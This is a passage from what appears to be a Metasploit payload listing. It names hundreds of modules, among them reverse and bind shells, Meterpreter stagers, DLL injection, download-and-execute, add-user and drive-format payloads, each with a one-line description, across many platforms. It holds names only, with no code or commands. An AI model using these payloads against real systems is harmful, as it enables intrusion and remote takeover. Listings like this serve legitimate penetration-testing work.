linux/mips64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/mips64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/mipsbe/exec normal No Linux Execute Command - linux/mipsbe/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/mipsbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/mipsbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/mipsbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/mipsbe/reboot normal No Linux Reboot - linux/mipsbe/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/mipsbe/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/mipsbe/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/mipsle/exec normal No Linux Execute Command - linux/mipsle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/mipsle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/mipsle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/mipsle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/mipsle/reboot normal No Linux Reboot - linux/mipsle/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/mipsle/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/mipsle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/ppc/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/ppc/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/ppc/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/ppc/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/ppc/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/ppc/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/ppc64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/ppc64/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/ppc64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/ppc64le/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/ppc64le/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/ppc64le/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/ppce500v2/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/ppce500v2/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/ppce500v2/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/x64/exec normal No Linux Execute Command - linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager - linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager - linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager - linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6) - linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline - linux/x64/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6) - linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/x86/adduser normal No Linux Add User - linux/x86/chmod normal No Linux Chmod - linux/x86/exec normal No Linux Execute Command - linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86) - linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86) - linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager - linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86) - linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86) - linux/x86/meterpreter/find_tag normal No Linux Mettle x86, Find Tag Stager - linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6) - linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager - linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager - linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager - linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP - linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline - linux/x86/read_file normal No Linux Read File - linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) - linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) - linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager - linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86) - linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) - linux/x86/shell/find_tag normal No Linux Command Shell, Find Tag Stager - linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6) - linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager - linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6) - linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline - linux/x86/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/x86/shell_find_tag normal No Linux Command Shell, Find Tag Inline - linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6) - linux/zarch/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/zarch/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/zarch/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - mainframe/shell_reverse_tcp normal No Z/OS (MVS) Command Shell, Reverse TCP Inline - multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures) - multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures) - netware/shell/reverse_tcp normal No NetWare Command Shell, Reverse TCP Stager - nodejs/shell_bind_tcp normal No Command Shell, Bind TCP (via nodejs) - nodejs/shell_reverse_tcp normal No Command Shell, Reverse TCP (via nodejs) - nodejs/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via nodejs) - osx/armle/execute/bind_tcp normal No OS X Write and Execute Binary, Bind TCP Stager - osx/armle/execute/reverse_tcp normal No OS X Write and Execute Binary, Reverse TCP Stager - osx/armle/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager - osx/armle/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager - osx/armle/shell_bind_tcp normal No Apple iOS Command Shell, Bind TCP Inline - osx/armle/shell_reverse_tcp normal No Apple iOS Command Shell, Reverse TCP Inline - osx/armle/vibrate normal No Apple iOS iPhone Vibrate - osx/ppc/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager - osx/ppc/shell/find_tag normal No OS X Command Shell, Find Tag Stager - osx/ppc/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager - osx/ppc/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline - osx/ppc/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline - osx/x64/dupandexecve/bind_tcp normal No OS X dup2 Command Shell, Bind TCP Stager - osx/x64/dupandexecve/reverse_tcp normal No OS X dup2 Command Shell, Reverse TCP Stager - osx/x64/exec normal No OS X x64 Execute Command - osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager - osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager - osx/x64/meterpreter_reverse_http normal No OSX Meterpreter, Reverse HTTP Inline - osx/x64/meterpreter_reverse_https normal No OSX Meterpreter, Reverse HTTPS Inline - osx/x64/meterpreter_reverse_tcp normal No OSX Meterpreter, Reverse TCP Inline - osx/x64/say normal No OS X x64 say Shellcode - osx/x64/shell_bind_tcp normal No OS X x64 Shell Bind TCP - osx/x64/shell_find_tag normal No OSX Command Shell, Find Tag Inline - osx/x64/shell_reverse_tcp normal No OS X x64 Shell Reverse TCP - osx/x86/bundleinject/bind_tcp normal No Mac OS X Inject Mach-O Bundle, Bind TCP Stager - osx/x86/bundleinject/reverse_tcp normal No Mac OS X Inject Mach-O Bundle, Reverse TCP Stager - osx/x86/exec normal No OS X Execute Command - osx/x86/isight/bind_tcp normal No Mac OS X x86 iSight Photo Capture, Bind TCP Stager - osx/x86/isight/reverse_tcp normal No Mac OS X x86 iSight Photo Capture, Reverse TCP Stager - osx/x86/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline - osx/x86/shell_find_port normal No OS X Command Shell, Find Port Inline - osx/x86/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline - osx/x86/vforkshell/bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Stager - osx/x86/vforkshell/reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Stager - osx/x86/vforkshell_bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Inline - osx/x86/vforkshell_reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Inline - php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl) - php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6 - php/bind_php normal No PHP Command Shell, Bind TCP (via PHP) - php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6 - php/download_exec normal No PHP Executable Download and Execute - php/exec normal No PHP Execute Command - php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager - php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6 - php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support - php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support - php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager - php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager - php/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline - php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl) - php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP) - php/shell_findsock normal No PHP Command Shell, Find Sock - python/meterpreter/bind_tcp normal No Python Meterpreter, Python Bind TCP Stager - python/meterpreter/bind_tcp_uuid normal No Python Meterpreter, Python Bind TCP Stager with UUID Support - python/meterpreter/reverse_http normal No Python Meterpreter, Python Reverse HTTP Stager - python/meterpreter/reverse_https normal No Python Meterpreter, Python Reverse HTTPS Stager - python/meterpreter/reverse_tcp normal No Python Meterpreter, Python Reverse TCP Stager - python/meterpreter/reverse_tcp_ssl normal No Python Meterpreter, Python Reverse TCP SSL Stager - python/meterpreter/reverse_tcp_uuid normal No Python Meterpreter, Python Reverse TCP Stager with UUID Support - python/meterpreter_bind_tcp normal No Python Meterpreter Shell, Bind TCP Inline - python/meterpreter_reverse_http normal No Python Meterpreter Shell, Reverse HTTP Inline - python/meterpreter_reverse_https normal No Python Meterpreter Shell, Reverse HTTPS Inline - python/meterpreter_reverse_tcp normal No Python Meterpreter Shell, Reverse TCP Inline - python/shell_bind_tcp normal No Command Shell, Bind TCP (via python) - python/shell_reverse_tcp normal No Command Shell, Reverse TCP (via python) - python/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via python) - python/shell_reverse_udp normal No Command Shell, Reverse UDP (via python) - r/shell_bind_tcp normal No R Command Shell, Bind TCP - r/shell_reverse_tcp normal No R Command Shell, Reverse TCP - ruby/shell_bind_tcp normal No Ruby Command Shell, Bind TCP - ruby/shell_bind_tcp_ipv6 normal No Ruby Command Shell, Bind TCP IPv6 - ruby/shell_reverse_tcp normal No Ruby Command Shell, Reverse TCP - ruby/shell_reverse_tcp_ssl normal No Ruby Command Shell, Reverse TCP SSL - solaris/sparc/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline - solaris/sparc/shell_find_port normal No Solaris Command Shell, Find Port Inline - solaris/sparc/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline - solaris/x86/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline - solaris/x86/shell_find_port normal No Solaris Command Shell, Find Port Inline - solaris/x86/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline - tty/unix/interact normal No Unix TTY, Interact with Established Connection - windows/adduser normal No Windows Execute net user /ADD - windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager - windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager - windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86) - windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager - windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7) - windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86) - windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86) - windows/dllinject/find_tag normal No Reflective DLL Injection, Find Tag Ordinal Stager - windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager - windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet) - windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy - windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6) - windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7) - windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7) - windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager - windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager - windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS) - windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support - windows/dllinject/reverse_udp normal No Reflective DLL Injection, Reverse UDP Stager with UUID Support - windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp) - windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution - windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute - windows/exec normal No Windows Execute Command - windows/format_all_drives manual No Windows Drive Formatter - windows/loadlibrary normal No Windows LoadLibrary Path - windows/messagebox normal No Windows MessageBox - windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager - windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager - windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) - windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager - windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) - windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86) - windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) - windows/meterpreter/find_tag normal No Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager - windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager - windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet) - windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy - windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet) - windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy - windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) - windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager - windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) - windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) - windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager - windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager - windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) - windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support - windows/meterpreter/reverse_udp normal No Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support - windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp) - windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp) - windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline - windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline - windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline - windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline - windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) - windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline - windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP - windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline - windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager - windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager - windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86) - windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager - windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7) - windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86) - windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86) - windows/patchupdllinject/find_tag normal No Windows Inject DLL, Find Tag Ordinal Stager - windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6) - windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7) - windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) - windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager - windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager - windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS) - windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support - windows/patchupdllinject/reverse_udp normal No Windows Inject DLL, Reverse UDP Stager with UUID Support - windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager - windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager - windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86) - windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager - windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7) - windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86) - windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86) - windows/patchupmeterpreter/find_tag normal No Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager - windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6) - windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7) - windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7) - windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager - windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager - windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS) - windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support - windows/patchupmeterpreter/reverse_udp normal No Windows Meterpreter (skape/jt Injection), Reverse UDP Stager with UUID Support - windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP - windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP - windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager - windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager - windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86) - windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager - windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7) - windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86) - windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86) - windows/shell/find_tag normal No Windows Command Shell, Find Tag Ordinal Stager - windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6) - windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7) - windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) - windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager - windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager - windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS) - windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support - windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support - windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline - windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline - windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline - windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline - windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!" - windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager - windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager - windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86) - windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager - windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7) - windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86) - windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86) - windows/upexec/find_tag normal No Windows Upload/Execute, Find Tag Ordinal Stager - windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6) - windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) - windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) - windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager - windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager - windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS) - windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, 